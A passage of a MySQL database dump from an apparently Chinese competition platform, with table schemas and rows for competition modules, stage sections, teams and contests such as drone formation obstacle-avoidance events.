) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `commits`
|
||
--
|
||
|
||
LOCK TABLES `commits` WRITE;
|
||
/*!40000 ALTER TABLE `commits` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `commits` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `competition_modules`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `competition_modules`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `competition_modules` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`hidden` tinyint(1) DEFAULT '0',
|
||
`position` int(11) DEFAULT NULL,
|
||
`competition_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`key` varchar(255) DEFAULT NULL,
|
||
`reachable` tinyint(1) DEFAULT '0',
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_competition_modules_on_position` (`position`),
|
||
KEY `index_competition_modules_on_key` (`key`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=141 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `competition_modules`
|
||
--
|
||
|
||
LOCK TABLES `competition_modules` WRITE;
|
||
/*!40000 ALTER TABLE `competition_modules` DISABLE KEYS */;
|
||
INSERT INTO `competition_modules` VALUES (1,'首页',0,1,1,'2019-08-07 16:36:35','2019-08-07 16:36:35','home',0),(2,'报名',0,2,1,'2019-08-07 16:36:35','2019-08-07 16:36:35','enroll',0),(3,'通知公告',0,3,1,'2019-08-07 16:36:35','2019-08-07 16:36:35','notice',0),(4,'排行榜',0,4,1,'2019-08-07 16:36:35','2019-08-07 16:36:35','ranking',0),(5,'参赛手册',0,5,1,'2019-08-07 16:36:35','2019-08-07 16:36:35','manual',0),(6,'首页',0,1,2,'2019-08-07 16:36:35','2019-08-07 16:36:35','home',0),(7,'报名',0,2,2,'2019-08-07 16:36:35','2019-08-07 16:36:35','enroll',0),(8,'通知公告',0,3,2,'2019-08-07 16:36:35','2019-08-07 16:36:35','notice',0),(9,'排行榜',0,4,2,'2019-08-07 16:36:35','2019-08-07 16:36:35','ranking',0),(10,'参赛手册',0,5,2,'2019-08-07 16:36:35','2019-08-07 16:36:35','manual',0),(11,'首页',0,1,3,'2019-08-07 16:36:35','2019-08-07 16:36:35','home',0),(12,'报名',0,2,3,'2019-08-07 16:36:35','2019-08-07 16:36:35','enroll',0),(13,'通知公告',0,3,3,'2019-08-07 16:36:35','2019-08-07 16:36:35','notice',0),(14,'排行榜',0,4,3,'2019-08-07 16:36:35','2019-08-07 16:36:35','ranking',0),(15,'参赛手册',0,5,3,'2019-08-07 16:36:35','2019-08-07 16:36:35','manual',0),(16,'首页',0,1,4,'2019-08-07 16:36:35','2019-08-07 16:36:35','home',0),(17,'报名',0,2,4,'2019-08-07 16:36:35','2019-08-07 16:36:35','enroll',0),(18,'通知公告',0,3,4,'2019-08-07 16:36:35','2019-08-07 16:36:35','notice',0),(19,'排行榜',0,4,4,'2019-08-07 16:36:35','2019-08-07 16:36:35','ranking',0),(20,'参赛手册',0,5,4,'2019-08-07 16:36:35','2019-08-07 16:36:35','manual',0),(21,'首页',0,1,5,'2019-08-07 16:36:36','2019-08-07 16:36:36','home',0),(22,'报名',0,2,5,'2019-08-07 16:36:36','2019-08-07 16:36:36','enroll',0),(23,'通知公告',0,3,5,'2019-08-07 16:36:36','2019-08-07 16:36:36','notice',0),(24,'排行榜',0,4,5,'2019-08-07 16:36:36','2019-08-07 16:36:36','ranking',0),(25,'参赛手册',0,5,5,'2019-08-07 16:36:36','2019-08-07 16:36:36','manual',0),(26,'首页',0,1,6,'2019-08-07 16:36:40','2019-11-18 09:29:16','home',1),(27,'报名',0,2,6,'2019-08-07 16:36:40','2019-11-18 09:29:16','enroll',1),(28,'通知公告',0,3,6,'2019-08-07 16:36:40','2019-11-18 09:29:16','notice',1),(29,'排行榜',0,5,6,'2019-08-07 16:36:40','2020-08-17 10:41:30','ranking',1),(30,'参赛手册',0,4,6,'2019-08-07 16:36:40','2020-08-17 10:41:30','manual',1),(31,'首页',0,1,7,'2019-08-14 15:03:29','2019-10-08 13:52:16','home',1),(32,'报名',0,2,7,'2019-08-14 15:03:29','2019-10-08 13:52:16','enroll',1),(33,'通知公告',0,3,7,'2019-08-14 15:03:29','2019-08-14 15:03:29','notice',0),(34,'排行榜',0,4,7,'2019-08-14 15:03:29','2019-08-14 15:03:29','ranking',0),(35,'参赛手册',0,5,7,'2019-08-14 15:03:29','2019-08-14 15:03:29','manual',0),(36,'首页',0,1,8,'2019-08-14 18:42:00','2019-11-05 11:06:55','home',1),(37,'报名',0,3,8,'2019-08-14 18:42:00','2019-11-05 11:06:55','enroll',1),(38,'通知公告',0,2,8,'2019-08-14 18:42:00','2019-08-15 18:22:00','notice',0),(39,'排行榜',0,4,8,'2019-08-14 18:42:00','2019-08-14 18:42:00','ranking',0),(40,'参赛手册',0,5,8,'2019-08-14 18:42:00','2019-08-14 18:42:00','manual',0),(41,'首页',0,1,9,'2019-10-30 16:36:20','2019-11-18 09:28:46','home',1),(42,'报名',0,2,9,'2019-10-30 16:36:20','2019-11-18 09:28:46','enroll',1),(43,'通知公告',0,3,9,'2019-10-30 16:36:20','2019-11-18 09:28:46','notice',1),(44,'排行榜',0,4,9,'2019-10-30 16:36:20','2019-11-18 09:28:46','ranking',1),(45,'参赛手册',0,5,9,'2019-10-30 16:36:20','2019-11-18 09:28:46','manual',1),(46,'首页',0,1,10,'2019-11-05 11:05:46','2019-11-05 11:05:46','home',0),(47,'报名',0,2,10,'2019-11-05 11:05:46','2019-11-05 11:05:46','enroll',0),(48,'通知公告',0,3,10,'2019-11-05 11:05:46','2019-11-05 11:05:46','notice',0),(49,'排行榜',0,4,10,'2019-11-05 11:05:46','2019-11-05 11:05:46','ranking',0),(50,'参赛手册',0,5,10,'2019-11-05 11:05:46','2019-11-05 11:05:46','manual',0),(51,'首页',0,1,11,'2019-11-05 16:59:42','2019-11-05 17:11:30','home',1),(52,'报名',0,2,11,'2019-11-05 16:59:42','2019-11-05 17:11:30','enroll',1),(53,'通知公告',0,3,11,'2019-11-05 16:59:42','2019-11-05 16:59:42','notice',0),(54,'排行榜',0,4,11,'2019-11-05 16:59:42','2019-11-05 16:59:42','ranking',0),(55,'参赛手册',0,5,11,'2019-11-05 16:59:42','2019-11-05 16:59:42','manual',0),(56,'首页',0,1,12,'2019-11-05 17:33:07','2019-11-05 17:33:07','home',0),(57,'报名',0,2,12,'2019-11-05 17:33:07','2019-11-05 17:33:07','enroll',0),(58,'通知公告',0,3,12,'2019-11-05 17:33:07','2019-11-05 17:33:07','notice',0),(59,'排行榜',0,4,12,'2019-11-05 17:33:07','2019-11-05 17:33:07','ranking',0),(60,'参赛手册',0,5,12,'2019-11-05 17:33:07','2019-11-05 17:33:07','manual',0),(61,'首页',0,1,13,'2019-11-06 17:21:21','2019-11-06 17:24:45','home',1),(62,'报名',0,2,13,'2019-11-06 17:21:21','2019-11-06 17:24:45','enroll',1),(63,'通知公告',0,3,13,'2019-11-06 17:21:21','2019-11-06 17:21:21','notice',0),(64,'排行榜',0,4,13,'2019-11-06 17:21:21','2019-11-06 17:21:21','ranking',0),(65,'参赛手册',0,5,13,'2019-11-06 17:21:21','2019-11-06 17:21:21','manual',0),(66,'首页',0,1,14,'2019-11-07 17:00:30','2019-11-07 17:00:30','home',0),(67,'报名',0,2,14,'2019-11-07 17:00:30','2019-11-07 17:00:30','enroll',0),(68,'通知公告',0,3,14,'2019-11-07 17:00:30','2019-11-07 17:00:30','notice',0),(69,'排行榜',0,4,14,'2019-11-07 17:00:30','2019-11-09 10:09:09','ranking',0),(70,'参赛手册',0,5,14,'2019-11-07 17:00:30','2019-11-09 10:09:09','manual',0),(71,'首页',0,1,15,'2019-11-10 13:54:41','2019-11-10 13:59:42','home',1),(72,'报名',0,2,15,'2019-11-10 13:54:41','2019-11-10 13:59:42','enroll',1),(73,'通知公告',0,3,15,'2019-11-10 13:54:41','2019-11-18 09:16:54','notice',1),(74,'排行榜',0,4,15,'2019-11-10 13:54:41','2019-11-18 09:16:54','ranking',1),(75,'参赛手册',0,5,15,'2019-11-10 13:54:41','2019-11-18 09:16:54','manual',1),(76,'首页',0,1,16,'2019-11-24 21:29:30','2019-11-24 21:29:30','home',0),(77,'报名',0,2,16,'2019-11-24 21:29:30','2019-11-24 21:29:30','enroll',0),(78,'通知公告',0,3,16,'2019-11-24 21:29:30','2019-11-24 21:29:30','notice',0),(79,'排行榜',0,4,16,'2019-11-24 21:29:30','2019-11-24 21:29:30','ranking',0),(80,'参赛手册',0,5,16,'2019-11-24 21:29:30','2019-11-24 21:29:30','manual',0),(81,'首页',0,1,17,'2019-11-25 08:42:15','2019-11-25 08:42:50','home',1),(82,'报名',0,2,17,'2019-11-25 08:42:15','2019-11-25 08:42:50','enroll',1),(83,'通知公告',0,3,17,'2019-11-25 08:42:15','2019-11-25 08:42:15','notice',0),(84,'排行榜',0,4,17,'2019-11-25 08:42:15','2019-11-25 08:42:15','ranking',0),(85,'参赛手册',0,5,17,'2019-11-25 08:42:15','2019-11-25 08:42:15','manual',0),(86,'首页',0,1,18,'2019-11-25 09:09:38','2019-11-25 09:09:52','home',1),(87,'报名',0,2,18,'2019-11-25 09:09:38','2019-11-25 09:09:52','enroll',1),(88,'通知公告',0,3,18,'2019-11-25 09:09:38','2019-11-25 09:09:38','notice',0),(89,'排行榜',0,4,18,'2019-11-25 09:09:38','2019-11-25 09:09:38','ranking',0),(90,'参赛手册',0,5,18,'2019-11-25 09:09:38','2019-11-25 09:09:38','manual',0),(91,'首页',0,1,19,'2020-03-18 15:33:30','2020-03-18 15:33:30','home',0),(92,'报名',0,2,19,'2020-03-18 15:33:30','2020-03-18 15:33:30','enroll',0),(93,'通知公告',0,3,19,'2020-03-18 15:33:30','2020-03-18 15:33:30','notice',0),(94,'排行榜',0,4,19,'2020-03-18 15:33:30','2020-03-18 15:33:30','ranking',0),(95,'参赛手册',0,5,19,'2020-03-18 15:33:30','2020-03-18 15:33:30','manual',0),(96,'首页',0,1,20,'2020-03-18 15:46:34','2020-03-18 15:47:32','home',1),(97,'报名',0,2,20,'2020-03-18 15:46:34','2020-03-18 15:47:32','enroll',1),(98,'通知公告',0,3,20,'2020-03-18 15:46:34','2020-03-18 15:46:34','notice',0),(99,'排行榜',0,4,20,'2020-03-18 15:46:34','2020-03-18 15:46:34','ranking',0),(100,'参赛手册',0,5,20,'2020-03-18 15:46:34','2020-03-18 15:46:34','manual',0),(101,'首页',0,1,21,'2020-03-18 15:50:28','2020-03-18 15:50:45','home',1),(102,'报名',0,2,21,'2020-03-18 15:50:28','2020-03-18 16:31:10','enroll',1),(103,'通知公告',0,3,21,'2020-03-18 15:50:28','2020-03-18 16:31:10','notice',0),(104,'排行榜',0,4,21,'2020-03-18 15:50:28','2020-03-18 15:50:28','ranking',0),(105,'参赛手册',0,5,21,'2020-03-18 15:50:28','2020-03-18 15:50:28','manual',0),(106,'首页',0,1,22,'2020-03-18 16:20:46','2020-03-18 16:38:26','home',1),(107,'报名',0,2,22,'2020-03-18 16:20:46','2020-03-18 16:38:26','enroll',1),(108,'通知公告',0,3,22,'2020-03-18 16:20:46','2020-03-18 16:20:46','notice',0),(109,'排行榜',0,4,22,'2020-03-18 16:20:46','2020-03-18 16:20:46','ranking',0),(110,'参赛手册',0,5,22,'2020-03-18 16:20:46','2020-03-18 16:20:46','manual',0),(111,'首页',0,1,23,'2020-03-19 15:50:14','2020-03-19 15:50:14','home',0),(112,'报名',0,2,23,'2020-03-19 15:50:14','2020-03-19 15:50:14','enroll',0),(113,'通知公告',0,3,23,'2020-03-19 15:50:14','2020-03-19 15:50:14','notice',0),(114,'排行榜',0,4,23,'2020-03-19 15:50:14','2020-03-19 15:50:14','ranking',0),(115,'参赛手册',0,5,23,'2020-03-19 15:50:14','2020-03-19 15:50:14','manual',0),(116,'首页',0,1,24,'2020-08-17 09:42:27','2020-08-17 09:44:58','home',1),(117,'报名',0,2,24,'2020-08-17 09:42:27','2020-08-17 09:44:58','enroll',1),(118,'通知公告',0,3,24,'2020-08-17 09:42:27','2020-08-17 09:44:58','notice',1),(119,'排行榜',0,4,24,'2020-08-17 09:42:27','2020-08-17 09:42:27','ranking',0),(120,'参赛手册',0,5,24,'2020-08-17 09:42:27','2020-08-17 09:44:58','manual',1),(121,'首页',0,1,25,'2020-08-17 09:44:21','2020-08-17 09:44:47','home',1),(122,'报名',0,2,25,'2020-08-17 09:44:21','2020-08-17 09:44:47','enroll',1),(123,'通知公告',0,3,25,'2020-08-17 09:44:21','2020-08-17 09:44:47','notice',1),(124,'排行榜',0,4,25,'2020-08-17 09:44:21','2020-08-17 09:44:21','ranking',0),(125,'参赛手册',0,5,25,'2020-08-17 09:44:21','2020-08-17 09:44:47','manual',1),(126,'首页',0,1,26,'2020-08-25 09:51:36','2020-08-25 09:53:00','home',1),(127,'报名',0,2,26,'2020-08-25 09:51:36','2020-08-25 09:53:00','enroll',1),(128,'通知公告',0,3,26,'2020-08-25 09:51:36','2020-08-25 09:53:00','notice',1),(129,'排行榜',0,4,26,'2020-08-25 09:51:36','2020-08-25 09:53:00','ranking',1),(130,'参赛手册',0,5,26,'2020-08-25 09:51:36','2020-08-25 09:53:00','manual',1),(131,'首页',0,1,27,'2020-10-16 15:19:09','2020-10-16 15:19:09','home',0),(132,'报名',0,2,27,'2020-10-16 15:19:09','2020-10-16 15:19:09','enroll',0),(133,'通知公告',0,3,27,'2020-10-16 15:19:09','2020-10-16 15:19:09','notice',0),(134,'排行榜',0,4,27,'2020-10-16 15:19:09','2020-10-16 15:19:09','ranking',0),(135,'参赛手册',0,5,27,'2020-10-16 15:19:09','2020-10-16 15:19:09','manual',0),(136,'首页',0,1,28,'2020-11-09 08:54:25','2021-02-24 08:20:35','home',1),(137,'报名',0,2,28,'2020-11-09 08:54:25','2021-02-24 08:20:35','enroll',1),(138,'通知公告',0,3,28,'2020-11-09 08:54:25','2021-02-24 08:20:35','notice',1),(139,'排行榜',0,4,28,'2020-11-09 08:54:25','2020-11-09 08:54:25','ranking',0),(140,'参赛手册',0,5,28,'2020-11-09 08:54:25','2021-02-24 08:20:35','manual',1);
|
||
/*!40000 ALTER TABLE `competition_modules` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `competition_scores`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `competition_scores`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `competition_scores` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`score` float DEFAULT NULL,
|
||
`score_type` varchar(255) DEFAULT NULL,
|
||
`region` varchar(255) DEFAULT NULL,
|
||
`cost_time` int(11) DEFAULT NULL,
|
||
`competition_id` int(11) DEFAULT NULL,
|
||
`competition_stage_id` int(11) DEFAULT NULL,
|
||
`competition_team_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `competition_scores`
|
||
--
|
||
|
||
LOCK TABLES `competition_scores` WRITE;
|
||
/*!40000 ALTER TABLE `competition_scores` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `competition_scores` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `competition_stage_sections`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `competition_stage_sections`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `competition_stage_sections` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`start_time` datetime DEFAULT NULL,
|
||
`end_time` datetime DEFAULT NULL,
|
||
`entry` int(11) DEFAULT NULL,
|
||
`competition_id` int(11) DEFAULT NULL,
|
||
`competition_stage_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=20 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `competition_stage_sections`
|
||
--
|
||
|
||
LOCK TABLES `competition_stage_sections` WRITE;
|
||
/*!40000 ALTER TABLE `competition_stage_sections` DISABLE KEYS */;
|
||
INSERT INTO `competition_stage_sections` VALUES (2,'初赛','2019-08-15 18:43:00','2019-09-27 18:43:00',NULL,8,NULL,'2019-09-03 14:06:47','2019-09-03 14:06:47'),(3,'复赛','2019-09-05 14:06:00','2019-09-19 14:06:00',NULL,8,NULL,'2019-09-03 14:06:47','2019-09-03 14:06:47'),(7,'初赛','2019-09-30 16:39:00','2019-11-10 16:39:00',NULL,9,NULL,'2019-10-30 17:34:04','2019-10-30 17:34:04'),(8,' 预赛','2019-12-01 17:02:00','2019-12-07 17:02:00',NULL,14,NULL,'2019-11-07 17:02:59','2019-11-07 17:02:59'),(9,'决赛','2019-12-12 17:02:00','2019-12-29 17:02:00',NULL,14,NULL,'2019-11-07 17:02:59','2019-11-07 17:02:59'),(10,'初赛','2019-11-21 13:55:00','2019-12-10 13:55:00',NULL,15,NULL,'2019-11-10 13:56:24','2019-11-10 13:56:24'),(11,'决赛','2019-12-11 13:56:00','2019-12-18 13:56:00',NULL,15,NULL,'2019-11-10 13:56:24','2019-11-10 13:56:24'),(12,'一','2020-03-22 15:51:00','2020-03-23 15:51:00',NULL,21,NULL,'2020-03-18 15:51:43','2020-03-18 15:51:43'),(13,'二','2020-03-24 15:51:00','2020-03-25 15:51:00',NULL,21,NULL,'2020-03-18 15:51:43','2020-03-18 15:51:43'),(14,'初赛','2020-03-18 15:53:00','2020-03-21 15:53:00',NULL,20,NULL,'2020-03-18 15:53:34','2020-03-18 15:53:34'),(18,'初赛','2020-08-29 09:53:00','2020-08-30 09:53:00',NULL,26,NULL,'2020-08-25 09:54:06','2020-08-25 09:54:06'),(19,'复赛','2020-08-31 09:53:00','2020-08-31 09:59:00',NULL,26,NULL,'2020-08-25 09:54:06','2020-08-25 09:54:06');
|
||
/*!40000 ALTER TABLE `competition_stage_sections` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `competition_stages`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `competition_stages`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `competition_stages` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`competition_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `competition_stages`
|
||
--
|
||
|
||
LOCK TABLES `competition_stages` WRITE;
|
||
/*!40000 ALTER TABLE `competition_stages` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `competition_stages` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `competition_teams`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `competition_teams`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `competition_teams` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`competition_id` int(11) DEFAULT NULL,
|
||
`team_type` int(11) DEFAULT '0',
|
||
`invite_code` varchar(255) DEFAULT NULL,
|
||
`teacher_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=47 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `competition_teams`
|
||
--
|
||
|
||
LOCK TABLES `competition_teams` WRITE;
|
||
/*!40000 ALTER TABLE `competition_teams` DISABLE KEYS */;
|
||
INSERT INTO `competition_teams` VALUES (1,'无敌战队',52,6,1,'ifa6mh',NULL,'2019-08-09 15:58:29','2019-08-09 15:58:29'),(2,'ast001',49,6,1,'fpcmb9',NULL,'2019-08-13 10:05:46','2019-08-13 10:05:46'),(3,'张旭',50,8,0,NULL,NULL,'2019-08-15 08:49:15','2019-08-15 08:49:15'),(4,'无极',20,8,0,NULL,NULL,'2019-10-08 13:51:28','2019-10-08 13:51:28'),(5,'无极',20,7,0,NULL,NULL,'2019-10-08 13:51:44','2019-10-08 13:51:44'),(6,'设计者',49,7,1,'eb8l4w',NULL,'2019-10-08 13:54:59','2019-10-08 13:54:59'),(7,'DavidLi',46,8,0,NULL,NULL,'2019-10-22 16:26:58','2019-10-22 16:26:58'),(8,'李明军',46,9,0,NULL,NULL,'2019-10-30 16:42:07','2019-10-30 16:42:07'),(9,'李国宁',49,9,0,NULL,NULL,'2019-11-05 11:03:47','2019-11-05 11:03:47'),(10,'OpenSource',50,12,0,NULL,NULL,'2019-11-05 17:34:46','2019-11-05 17:34:46'),(11,'李国宁',49,12,0,NULL,NULL,'2019-11-05 17:35:12','2019-11-05 17:35:12'),(12,'科大01',46,11,1,'kinlft',NULL,'2019-11-06 08:46:44','2019-11-06 08:46:44'),(13,'ss',49,11,1,'kuctew',NULL,'2019-11-06 17:22:49','2019-11-06 17:22:49'),(14,'李国宁',49,13,0,NULL,NULL,'2019-11-07 09:25:39','2019-11-07 09:25:39'),(15,'无双',64,11,1,'ojupqx',NULL,'2019-11-07 17:04:33','2019-11-07 17:04:33'),(16,'OpenSource',50,15,0,NULL,NULL,'2019-11-10 13:59:18','2019-11-10 13:59:18'),(17,'科大队',63,15,1,'36zkwl',NULL,'2019-11-10 14:06:46','2019-11-10 14:06:46'),(18,'人工智能队',71,15,1,'g84pon',NULL,'2019-11-10 14:08:31','2019-11-10 14:08:31'),(19,'图像队',66,15,1,'7en3ib',NULL,'2019-11-10 14:09:13','2019-11-10 14:09:13'),(20,'智能',59,15,1,'vkgoqu',NULL,'2019-11-13 08:45:08','2019-11-13 08:45:08'),(21,'李明军',46,16,0,NULL,NULL,'2019-11-25 06:15:32','2019-11-25 06:15:32'),(22,'张翔',65,16,0,NULL,NULL,'2019-11-25 08:30:27','2019-11-25 08:30:27'),(23,'李国宁',49,16,0,NULL,NULL,'2019-11-25 08:31:29','2019-11-25 08:31:29'),(24,'啊啊身体',49,17,1,'5wfi3k',NULL,'2019-11-25 08:43:56','2019-11-25 08:43:56'),(25,'ast',65,17,1,'kx5guw',NULL,'2019-11-25 09:06:20','2019-11-25 09:06:20'),(26,'挑战010',49,18,1,'ubmqes',NULL,'2019-11-25 09:18:51','2019-11-25 09:18:51'),(27,'11',73,21,1,'6nvey5',NULL,'2020-03-18 15:54:48','2020-03-18 15:54:48'),(28,'李明军',46,20,0,NULL,NULL,'2020-03-18 15:58:25','2020-03-18 15:58:25'),(29,'翟小玉',63,20,0,NULL,NULL,'2020-03-18 16:02:18','2020-03-18 16:02:18'),(30,'eee',1,21,1,'ufomen',NULL,'2020-03-18 16:22:31','2020-03-18 16:22:31'),(31,'风光过后',49,21,1,'k7xmlg',NULL,'2020-03-18 16:29:36','2020-03-18 16:29:36'),(32,'777',63,22,1,'5xc98p',NULL,'2020-03-18 16:48:07','2020-03-18 16:48:07'),(33,'666',46,22,1,'tvfrgw',NULL,'2020-03-18 16:50:17','2020-03-18 16:50:17'),(34,'H2',114,6,1,'w98rjv',NULL,'2020-08-17 11:17:26','2020-08-17 11:17:26'),(35,'OpenSource',1,24,0,NULL,NULL,'2020-08-17 15:07:11','2020-08-17 15:07:11'),(36,'C位',1,25,1,'t6gs89',NULL,'2020-08-17 15:07:54','2020-08-17 15:07:54'),(37,'超能陆战队',114,25,1,'eqs78r',NULL,'2020-08-17 17:10:27','2020-08-17 17:10:27'),(38,'jasder',48,24,0,NULL,NULL,'2020-08-20 11:14:47','2020-08-20 11:14:47'),(39,'sylor_huang',47,24,0,NULL,NULL,'2020-08-20 16:41:18','2020-08-20 16:41:18'),(40,'李国宁',49,24,0,NULL,NULL,'2020-08-21 09:07:21','2020-08-21 09:07:21'),(41,'SuperMax',47,25,1,'ch3ra7',NULL,'2020-08-21 10:39:31','2020-08-21 10:39:31'),(42,'后浪',111,25,1,'4bqlcs',NULL,'2020-08-24 16:29:56','2020-08-24 16:29:56'),(43,'年青时代',111,24,0,NULL,NULL,'2020-08-24 16:36:26','2020-08-24 16:36:26'),(44,'夺冠DM',1,26,1,'p5j6b3',NULL,'2020-09-21 17:25:55','2020-09-21 17:25:55'),(45,'李明军',46,27,0,NULL,NULL,'2020-10-16 15:20:39','2020-10-16 15:20:39'),(46,'aa',49,28,1,'xqk3v5',NULL,'2021-02-24 08:24:42','2021-02-24 08:24:42');
|
||
/*!40000 ALTER TABLE `competition_teams` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `competitions`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `competitions`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `competitions` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`title` varchar(255) DEFAULT NULL,
|
||
`start_time` datetime DEFAULT NULL,
|
||
`end_time` datetime DEFAULT NULL,
|
||
`identifier` varchar(255) DEFAULT NULL,
|
||
`available` tinyint(1) DEFAULT '0',
|
||
`online_time` datetime DEFAULT NULL,
|
||
`visits` int(11) DEFAULT '0',
|
||
`competition_lists_count` int(11) DEFAULT '0',
|
||
`min_num` int(11) DEFAULT '1',
|
||
`max_num` int(11) DEFAULT '1',
|
||
`enroll_end_time` datetime DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`status` int(11) DEFAULT '0',
|
||
`subtitle` varchar(255) DEFAULT NULL,
|
||
`team_members_count` int(11) DEFAULT '0',
|
||
`limit_type` int(11) DEFAULT '0',
|
||
`show_top` int(11) DEFAULT '0',
|
||
`content` text,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=29 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `competitions`
|
||
--
|
||
|
||
LOCK TABLES `competitions` WRITE;
|
||
/*!40000 ALTER TABLE `competitions` DISABLE KEYS */;
|
||
INSERT INTO `competitions` VALUES (1,'无人机编队避障竞赛','2019-08-08 16:35:00','2019-09-30 23:00:00',NULL,0,NULL,0,0,1,1,NULL,'2019-08-07 16:36:35','2019-08-07 16:36:35',0,'无人机竞赛',0,0,0,NULL),(2,'无人机编队避障竞赛','2019-08-08 16:35:00','2019-09-30 23:00:00',NULL,0,NULL,0,0,1,1,NULL,'2019-08-07 16:36:35','2019-08-07 16:36:35',0,'无人机竞赛',0,0,0,NULL),(3,'无人机编队避障竞赛','2019-08-08 16:35:00','2019-09-30 23:00:00',NULL,0,NULL,0,0,1,1,NULL,'2019-08-07 16:36:35','2019-08-07 16:36:35',0,'无人机竞赛',0,0,0,NULL),(4,'无人机编队避障竞赛','2019-08-08 16:35:00','2019-09-30 23:00:00',NULL,0,NULL,0,0,1,1,NULL,'2019-08-07 16:36:35','2019-08-07 16:36:35',0,'无人机竞赛',0,0,0,NULL),(5,'无人机编队避障竞赛','2019-08-08 16:35:00','2019-09-30 23:00:00',NULL,0,NULL,0,0,1,1,NULL,'2019-08-07 16:36:36','2019-08-07 16:36:36',0,'无人机竞赛',0,0,0,NULL),(6,'无人机编队避障竞赛','2019-08-08 16:35:00','2019-09-30 23:00:00','JS-2019-WRJ-001',0,'2019-08-09 16:42:48',621,0,1,5,NULL,'2019-08-07 16:36:40','2019-11-18 09:29:16',1,'无人机竞赛',7,0,0,NULL),(7,'创新苑Logo设计大赛','2019-08-15 15:00:00','2019-09-30 23:00:00',NULL,0,'2019-08-14 15:05:03',142,0,1,3,NULL,'2019-08-14 15:03:29','2020-08-17 09:42:58',0,'Logo设计',5,0,0,NULL),(8,'第二届全国绿色计算系列大赛——开源创新组','2019-11-15 18:41:00','2019-12-15 18:41:00',NULL,0,'2020-09-23 08:52:12',168,0,1,6,'2019-11-14 11:06:00','2019-08-14 18:42:00','2020-09-23 08:52:12',1,'第二届全国绿色计算系列大赛——开源创新组',3,0,0,NULL),(9,'2019无人机编队避障竞赛','2019-11-30 16:33:00','2020-01-31 16:33:00','2019-JS-WRJ-016',0,'2020-09-23 08:52:07',97,0,1,1,'2019-11-20 